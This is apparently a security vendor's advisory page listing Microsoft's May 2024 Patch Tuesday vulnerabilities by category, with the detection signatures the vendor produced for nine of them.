  • GAV: Cambiare_Rotta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

MICROSOFT SECURITY BULLETIN COVERAGE FOR MAY 2024

Overview

Microsoft’s May 2024 Patch Tuesday has 59 vulnerabilities, 25 of which are Remote Code Execution vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2024 and has produced coverage for 9 of the reported vulnerabilities.

Vulnerabilities with Detections

CVECVE TitleSignature
CVE-2024-29996Windows Common Log File System Driver Elevation of Privilege VulnerabilityASPY 568 Exploit-exe exe.MP_383
CVE-2024-30025Windows Common Log File System Driver Elevation of Privilege VulnerabilityASPY 569 Exploit-exe exe.MP_384
CVE-2024-30032Windows DWM Core Library Elevation of Privilege VulnerabilityASPY 570 Exploit-exe exe.MP_385
CVE-2024-30034Windows Cloud Files Mini Filter Driver Information Disclosure VulnerabilityASPY 571 Exploit-exe exe.MP_386
CVE-2024-30035Windows DWM Core Library Elevation of Privilege VulnerabilityASPY 572 Exploit-exe exe.MP_387
CVE-2024-30037Windows Common Log File System Driver Elevation of Privilege VulnerabilityASPY 567 Exploit-exe exe.MP_382
CVE-2024-30044Microsoft SharePoint Server Remote Code Execution VulnerabilityIPS 15674 Microsoft SharePoint Server Remote Code Execution (CVE-2024-30044)
CVE-2024-30050Windows Mark of the Web Security Feature Bypass VulnerabilityIPS 15666 Windows Mark of the Web Security Feature Bypass (CVE-2024-30050)
CVE-2024-30051Windows DWM Core Library Elevation of Privilege VulnerabilityASPY 566 Malformed-docx docx.MP_11

Release Breakdown

The vulnerabilities can be classified into the following categories:

For May, there are 57 critical, 1 Important, and 1 moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30011Windows Hyper-V Denial of Service Vulnerability
CVE-2024-30019DHCP Server Service Denial of Service Vulnerability
CVE-2024-30046ASP.NET Core Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2024-26238Microsoft PLUGScheduler Scheduled Task Elevation of Privilege Vulnerability
CVE-2024-29994Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-29996Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30007Microsoft Brokering File System Elevation of Privilege Vulnerability
CVE-2024-30018Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30025Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30027NTFS Elevation of Privilege Vulnerability
CVE-2024-30028Win32k Elevation of Privilege Vulnerability
CVE-2024-30030Win32k Elevation of Privilege Vulnerability
CVE-2024-30031Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
CVE-2024-30032Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-30033Windows Search Service Elevation of Privilege Vulnerability
CVE-2024-30035Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-30037Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30038Win32k Elevation of Privilege Vulnerability
CVE-2024-30049Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30051Windows DWM Core Library Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE-2024-30008Windows DWM Core Library Information Disclosure  Vulnerability
CVE-2024-30016Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-30034Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-30036Windows Deployment Services Information Disclosure Vulnerability
CVE-2024-30039Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30043Microsoft SharePoint Server Information Disclosure Vulnerability
CVE-2024-30054Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE-2024-29997Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-29998Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-29999Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30000Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30001Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30002Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30003Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30004Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30005Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30006Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-30009Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30010Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-30012Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30014Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30015Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30017Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-30020Windows Cryptographic Services Remote Code Execution Vulnerability
CVE-2024-30021Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30022Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30023Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30024Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30029Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30042Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-30044Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30045.NET and Visual Studio Remote Code Execution Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2024-30040Windows MSHTML Platform Security Feature Bypass Vulnerability
CVE-2024-30050Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2024-30041Microsoft Bing Search Spoofing Vulnerability
CVE-2024-30047Dynamics 365 Customer Insights Spoofing Vulnerability
CVE-2024-30048Dynamics 365 Customer Insights Spoofing Vulnerability
CVE-2024-30053Azure Migrate Cross-Site Scripting Vulnerability

Tampering Vulnerabilities

CVE-2024-30059Microsoft Intune for Android Mobile Application Management Tampering Vulnerability